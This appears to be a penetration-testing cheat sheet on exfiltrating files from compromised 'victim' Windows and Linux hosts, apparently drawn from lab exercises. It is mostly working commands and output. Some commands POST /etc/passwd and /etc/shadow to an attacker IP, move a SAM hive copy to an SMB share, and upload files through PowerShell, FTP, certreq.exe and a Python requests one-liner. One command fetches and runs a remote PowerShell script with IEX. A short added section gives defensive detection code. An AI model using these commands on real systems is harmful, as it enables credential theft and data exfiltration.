# Download - Exfiltration

## Tool

Updog

```
updog --ssl --port 9090 --password "exegol4thewin" --directory /opt/resources
```

## Living Off Trusted Sites

{% embed url="<https://lots-project.com/>" %}

## Web transfer

### **Create a Web Server on Linux victim host**

#### Python 3

```shell-session
python3 -m http.server 8000
```

#### Python 2.7

```shell-session
python2.7 -m SimpleHTTPServer
```

#### PHP

```shell-session
php -S 0.0.0.0:8000
```

#### Ruby

```shell-session
ruby -run -ehttpd . -p8000
```

### Create a web server on a Windows host

#### Windows - HFS HTTP File Server

{% embed url="<https://sourceforge.net/projects/hfs/>" %}

#### Powershell\_HttpServer

{% embed url="<https://github.com/zh54321/PowerShell_HttpServer>" %}

### Download file

```shell-session
wget 192.168.49.128:8000/filetotransfer.txt
```

## SCP

{% embed url="<https://linuxize.com/post/how-to-use-scp-command-to-securely-transfer-files/>" %}

```shell-session
scp /etc/passwd htb-student@10.129.86.90:/home/htb-student/
```

```
scp remote_username@10.10.0.2:/remote/file.txt /local/directory
```

## Base64

### **Windows**

#### **Transfer from victim host to attack host**

```powershell-session
PS C:\htb> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))

IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbX ... <SNIP>
```

```shell-session
echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXB... SNIP ... gICAgbG9jYWxob3N0DQo= | base64 -d > host
```

## SMB

```
$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/ltnbob/Documents/

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
```

```
C:\> move sam.save \\10.10.15.16\CompData
        1 file(s) moved.
```

### Metasploit - Download

{% content-ref url="../tools/metasploit" %}
[metasploit](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/metasploit)
{% endcontent-ref %}

### SMBclient - get

{% content-ref url="../protocols/smb-445-139-rpc" %}
[smb-445-139-rpc](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/smb-445-139-rpc)
{% endcontent-ref %}

`smb: \> get prep-prod.txt`

Source:

{% embed url="<http://www.delafond.org/traducmanfr/man/man1/smbclient.1.html>" %}

### SMBmap - download

{% content-ref url="../protocols/smb-445-139-rpc" %}
[smb-445-139-rpc](https://0xss0rz.gitbook.io/0xss0rz/pentest/protocols/smb-445-139-rpc)
{% endcontent-ref %}

```shell-session
$ smbmap -H 10.129.14.128 --download "notes\note.txt"

[+] Starting download: notes\note.txt (116 bytes)
[+] File output to: /htb/10.129.14.128-notes_note.txt
```

### SMB over WebDAV

#### From Windows to Linux

```shell-session
$ sudo pip3 install wsgidav cheroot
```

```shell-session
$ sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous 

[sudo] password for plaintext: 
Running without configuration file.
10:02:53.949 - WARNING : App wsgidav.mw.cors.Cors(None).is_disabled() returned True: skipping.
10:02:53.950 - INFO    : WsgiDAV/4.0.1 Python/3.9.2 Linux-5.15.0-15parrot1-amd64-x86_64-with-glibc2.31
10:02:53.950 - INFO    : Lock manager:      LockManager(LockStorageDict)
10:02:53.950 - INFO    : Property manager:  None
10:02:53.950 - INFO    : Domain controller: SimpleDomainController()
10:02:53.950 - INFO    : Registered DAV providers by route:
10:02:53.950 - INFO    :   - '/:dir_browser': FilesystemProvider for path '/usr/local/lib/python3.9/dist-packages/wsgidav/dir_browser/htdocs' (Read-Only) (anonymous)
10:02:53.950 - INFO    :   - '/': FilesystemProvider for path '/tmp' (Read-Write) (anonymous)
10:02:53.950 - WARNING : Basic authentication is enabled: It is highly recommended to enable SSL.
10:02:53.950 - WARNING : Share '/' will allow anonymous write access.
10:02:53.950 - WARNING : Share '/:dir_browser' will allow anonymous read access.
10:02:54.194 - INFO    : Running WsgiDAV/4.0.1 Cheroot/8.6.0 Python 3.9.2
10:02:54.194 - INFO    : Serving on http://0.0.0.0:80 ...
```

```cmd-session
C:\htb> dir \\192.168.49.128\DavWWWRoot

 Volume in drive \\192.168.49.128\DavWWWRoot has no label.
 Volume Serial Number is 0000-0000

 Directory of \\192.168.49.128\DavWWWRoot

05/18/2022  10:05 AM    <DIR>          .
05/18/2022  10:05 AM    <DIR>          ..
05/18/2022  10:05 AM    <DIR>          sharefolder
05/18/2022  10:05 AM                13 filetest.txt
               1 File(s)             13 bytes
               3 Dir(s)  43,443,318,784 bytes free
```

```cmd-session
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
C:\htb> copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\
```

## FTP

### From Windows victim to Linux

```shell-session
0xss0rz@htb[/htb]$ sudo python3 -m pyftpdlib --port 21 --write

/usr/local/lib/python3.9/dist-packages/pyftpdlib/authorizers.py:243: RuntimeWarning: write permissions assigned to anonymous user.
  warnings.warn("write permissions assigned to anonymous user.",
[I 2022-05-18 10:33:31] concurrency model: async
[I 2022-05-18 10:33:31] masquerade (NAT) address: None
[I 2022-05-18 10:33:31] passive ports: None
[I 2022-05-18 10:33:31] >>> starting FTP server on 0.0.0.0:21, pid=5155 <<<
```

```powershell-session
PS C:\htb> (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')
```

or

```cmd-session
C:\htb> echo open 192.168.49.128 > ftpcommand.txt
C:\htb> echo USER anonymous >> ftpcommand.txt
C:\htb> echo binary >> ftpcommand.txt
C:\htb> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\htb> echo bye >> ftpcommand.txt
C:\htb> ftp -v -n -s:ftpcommand.txt
ftp> open 192.168.49.128

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye
```

## Web exfiltration

### Uploadserver

#### Linux to Linux

{% embed url="<https://github.com/Densaugeo/uploadserver>" %}

```shell-session
$ sudo python3 -m pip install --user uploadserver

Collecting uploadserver
  Using cached uploadserver-2.0.1-py3-none-any.whl (6.9 kB)
Installing collected packages: uploadserver
Successfully installed uploadserver-2.0.1
```

```shell-session
# Create a Self-Signed Certificate
$ openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'

Generating a RSA private key
................................................................................+++++
.......+++++
writing new private key to 'server.pem'
-----
```

```shell-session
$ mkdir https && cd https
```

```shell-session
$ sudo python3 -m uploadserver 443 --server-certificate ~/server.pem
```

```shell-session
# Upload multiple files
$ curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
```

#### Windows victim to Linux

{% embed url="<https://github.com/Densaugeo/uploadserver>" %}

```shell-session
pip3 install uploadserver
```

```shell-session
$ python3 -m uploadserver

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

For HTTPS, create a self-signed certificate as shown in [Web exfiltration - Linux to Linux](#linux-to-linux).

{% embed url="<https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1>" %}

```powershell-session
PS C:\htb> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\htb> Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

[+] File Uploaded:  C:\Windows\System32\drivers\etc\hosts
[+] FileHash:  5E7241D66FD77E9E8EA866B6278B2373
```

### PowerShell Base64 Web Upload

```powershell-session
PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
```

```shell-session
$ nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/x-www-form-urlencoded
Host: 192.168.49.128:8000
Content-Length: 1820
Connection: Keep-Alive

IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQo
...SNIP...
```

```shell-session
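# Replace <base64> with the captured string; the quotes keep the shell from treating < and > as redirections
echo '<base64>' | base64 -d -w 0 > hosts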
```

### Python

{% embed url="<https://github.com/Densaugeo/uploadserver>" %}

```
sudo python3 -m pip install --user uploadserver
```

```shell-session
$ python3 -m uploadserver 

File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

```shell-session
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'
```

## Netcat

nc.exe

{% embed url="<https://github.com/int0x33/nc.exe/>" %}

Commands

{% embed url="<https://juggernaut-sec.com/windows-file-transfers-for-hackers/#Transferring_Files_onto_Victim_Using_Netcat_cmdexe>" %}

## WinRM

```powershell-session
PS C:\htb> Test-NetConnection -ComputerName DATABASE01 -Port 5985

ComputerName     : DATABASE01
RemoteAddress    : 192.168.1.101
RemotePort       : 5985
InterfaceAlias   : Ethernet0
SourceAddress    : 192.168.1.100
TcpTestSucceeded : True
```

```powershell-session
PS C:\htb> $Session = New-PSSession -ComputerName DATABASE01
```

```powershell-session
PS C:\htb> Copy-Item -Path "C:\Users\Administrator\Desktop\DATABASE.txt" -Destination C:\ -FromSession $Session
```

## RDP

### rdesktop

```shell-session
rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files'
```

### xfreerdp

```
xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer
```

### Remmina

{% embed url="<https://cat.pdx.edu/platforms/linux/remote-access/file-sharing-rdp-from-linux/>" %}

### Windows to windows

{% embed url="<https://www.helpwire.app/blog/remote-desktop-transfer-files/>" %}

## LOLBAS

{% embed url="<https://lolbas-project.github.io/#/upload>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fj2L4zIJqMuRk9u54WKiH%2FPasted%20image%2020240408061512.png?alt=media&#x26;token=3dd883c3-9e32-421d-9146-0a2e9db97248" alt=""><figcaption></figcaption></figure>

### **CertReq.exe**

```cmd-session
C:\htb> certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini
Certificate Request Processor: The operation timed out 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
```

```shell-session
0xss0rz@htb[/htb]$ sudo nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.1] 53819
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/json
User-Agent: Mozilla/4.0 (compatible; Win32; NDES client 10.0.19041.1466/vb_release_svc_prod1)
Content-Length: 92
Host: 192.168.49.128:8000

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```
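
Both netcat captures on this page (the PowerShell Base64 web upload and the CertReq.exe POST) expose request headers that a proxy or network sensor can match on. The Python below is an added example, not part of the original page: the sample requests are constructed from those captures, and the indicator names and the `known_ca_hosts` parameter are assumptions.

```python
import base64, json, re

# Constructed requests modelled on the two netcat captures on this page
# (bodies shortened; not real traffic).
PS_POST = (
    "POST / HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) "
    "WindowsPowerShell/5.1.19041.1682\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 192.168.49.128:8000\r\n\r\n"
    + base64.b64encode(b"# Copyright (c) 1993-2009 Microsoft Corp.\r\n# sample\r\n").decode()
)
CERTREQ_POST = (
    "POST / HTTP/1.1\r\n"
    "Content-Type: application/json\r\n"
    "User-Agent: Mozilla/4.0 (compatible; Win32; NDES client "
    "10.0.19041.1466/vb_release_svc_prod1)\r\n"
    "Host: 192.168.49.128:8000\r\n\r\n"
    "; for 16-bit app support\r\n[fonts]\r\n[extensions]\r\n"
)
BROWSER_GET = ("GET /index.html HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (X11; Linux "
               "x86_64) Firefox/125.0\r\nHost: intranet.example\r\n\r\n")

B64_ONLY = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # body is one long Base64 run

def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return request_line.split(" ", 1)[0], headers, body

def findings(raw, known_ca_hosts=()):
    """Return the indicator names (assumed labels) that match one request."""
    method, headers, body = parse_request(raw)
    if method != "POST":
        return []
    ua, hits = headers.get("user-agent", ""), []
    if "WindowsPowerShell/" in ua and B64_ONLY.fullmatch(body.strip()):
        hits.append("powershell-post-base64-body")
    # certreq identifies itself as an NDES client; POSTs to non-CA hosts stand out
    if "NDES client" in ua and headers.get("host") not in known_ca_hosts:
        hits.append("certreq-post-to-non-ca-host")
    if headers.get("content-type") == "application/json":
        try:
            json.loads(body)
        except ValueError:  # declared JSON, but the body is something else
            hits.append("json-content-type-non-json-body")
    return hits
```

Passing the organisation's real certificate-enrolment endpoints as `known_ca_hosts` suppresses the CertReq indicator for legitimate enrolment traffic while the content-type mismatch check still applies.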

## GTFOBins

{% embed url="<https://gtfobins.github.io/#+file%20upload>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fy1NJFNW2jovGPxZlrD2Q%2FPasted%20image%2020240408061849.png?alt=media&#x26;token=ccb3a69d-d3da-4818-b530-25f3237d4e38" alt=""><figcaption></figcaption></figure>

## Metasploit

{% content-ref url="../tools/metasploit" %}
[metasploit](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/metasploit)
{% endcontent-ref %}

```
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
meterpreter >
```

## WinRM

{% content-ref url="../tools/evil-winrm" %}
[evil-winrm](https://0xss0rz.gitbook.io/0xss0rz/pentest/tools/evil-winrm)
{% endcontent-ref %}

```
*Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip
```

## Resources

{% embed url="<https://juggernaut-sec.com/windows-file-transfers-for-hackers/>" %}

{% embed url="<https://www.hackingarticles.in/file-transfer-cheatsheet-windows-and-linux/>" %}

{% embed url="<https://ppn.snovvcrash.rocks/pentest/infrastructure/file-transfer>" %}

